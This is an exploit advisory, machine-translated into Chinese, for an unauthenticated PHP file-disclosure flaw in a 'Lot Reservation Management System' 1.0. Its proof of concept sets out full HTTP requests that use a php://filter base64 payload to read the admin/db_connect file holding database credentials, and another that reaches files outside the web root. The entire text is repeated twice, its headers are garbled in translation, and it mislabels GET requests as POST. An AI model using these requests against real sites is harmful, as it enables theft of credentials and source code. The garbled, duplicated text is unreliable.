#利用标题:批次保留管理系统未经身份验证的文件披露漏洞
#Google Dork: N/A
#DATE: 2023年12月10日
#利用作者: Elijah Mandila Syoyi
#供应商homepage3360 https://www.sourcecodester.com/php/...ource-source-source-source-source-source.html
#软件link: https://ww.sourcecodester.com/sites...-restreation-management-management-system.zip
#版本: 1.0
#在: Microsoft Windows 11 Enterprise和XAMPP 3.3.0测试
#CVE : N/A
开发人员有关应用程序目的的描述:-
------------------------------------------------------------------------------------------------------------------------------------------------------------------
关于
LOT预订管理系统是一个简单的PHP/Mysqli项目,它将有助于某些细分,公寓或任何出售土地财产或房屋和地段的业务。该系统将帮助上述行业或公司提供有关其销售财产的可能客户信息,同时,可能的客户可以保留其所需的财产。客户的Lot Reserve System网站具有用户友好的功能,并且显示的内容可以由管理层动态管理。该系统允许管理层上传区域映射,并且通过此功能,系统管理员或员工将填充他们要出售的地段,房屋模型或属性的列表,以允许可能的客户选择所需的区域。地图将分为建筑物属性的每个划分,例如某个细分的阶段1-5,这些阶段中的每个阶段都将在系统中单独编码,并显示每个属性或批次的划分的地图图像。
------------------------------------------------------------------------------------------------------------------------------------------------------------------
脆弱性:-
该应用程序容易受到PHP源代码披露漏洞的影响。攻击者可能会滥用这一点,以在应用程序中披露敏感的PHP文件以及服务器根部之外。在这种情况下,将使用PHP转换为Base64滤波器。
概念证明:-
(HTTP POST请求)
get/lot/index.php?page=php://filter/convert.base64-Encode/Resource=admin/db_connect http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Referer: http://192.168.150.228/lot/
cookie: phpsessID=O59SQRUFI4171O8BKBMF1AQ9SN
升级- 不肯定- requests: 1
通过将phpsessid cookie删除为:-,也可以实现同样的方法。
get/lot/index.php?page=php://filter/convert.base64-Encode/Resource=admin/db_connect http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Referer: http://192.168.150.228/lot/
升级- 不肯定- requests: 1
所请求的文件将在返回的HTTP响应中以Base64格式返回。
该攻击也可用于遍历目录以在Web根部之外返回文件。
get/lot/index.php?page=php://filter/convert.base64-Encode/Resource=d: \ test http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Referer: http://192.168.150.228/lot/
升级- 不肯定- requests: 1
这将在D: \ Directory中返回test.php文件。
#Google Dork: N/A
#DATE: 2023年12月10日
#利用作者: Elijah Mandila Syoyi
#供应商homepage3360 https://www.sourcecodester.com/php/...ource-source-source-source-source-source.html
#软件link: https://ww.sourcecodester.com/sites...-restreation-management-management-system.zip
#版本: 1.0
#在: Microsoft Windows 11 Enterprise和XAMPP 3.3.0测试
#CVE : N/A
开发人员有关应用程序目的的描述:-
------------------------------------------------------------------------------------------------------------------------------------------------------------------
关于
LOT预订管理系统是一个简单的PHP/Mysqli项目,它将有助于某些细分,公寓或任何出售土地财产或房屋和地段的业务。该系统将帮助上述行业或公司提供有关其销售财产的可能客户信息,同时,可能的客户可以保留其所需的财产。客户的Lot Reserve System网站具有用户友好的功能,并且显示的内容可以由管理层动态管理。该系统允许管理层上传区域映射,并且通过此功能,系统管理员或员工将填充他们要出售的地段,房屋模型或属性的列表,以允许可能的客户选择所需的区域。地图将分为建筑物属性的每个划分,例如某个细分的阶段1-5,这些阶段中的每个阶段都将在系统中单独编码,并显示每个属性或批次的划分的地图图像。
------------------------------------------------------------------------------------------------------------------------------------------------------------------
脆弱性:-
该应用程序容易受到PHP源代码披露漏洞的影响。攻击者可能会滥用这一点,以在应用程序中披露敏感的PHP文件以及服务器根部之外。在这种情况下,将使用PHP转换为Base64滤波器。
概念证明:-
(HTTP POST请求)
get/lot/index.php?page=php://filter/convert.base64-Encode/Resource=admin/db_connect http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Referer: http://192.168.150.228/lot/
cookie: phpsessID=O59SQRUFI4171O8BKBMF1AQ9SN
升级- 不肯定- requests: 1
通过将phpsessid cookie删除为:-,也可以实现同样的方法。
get/lot/index.php?page=php://filter/convert.base64-Encode/Resource=admin/db_connect http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Referer: http://192.168.150.228/lot/
升级- 不肯定- requests: 1
所请求的文件将在返回的HTTP响应中以Base64格式返回。
该攻击也可用于遍历目录以在Web根部之外返回文件。
get/lot/index.php?page=php://filter/convert.base64-Encode/Resource=d: \ test http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Referer: http://192.168.150.228/lot/
升级- 不肯定- requests: 1
这将在D: \ Directory中返回test.php文件。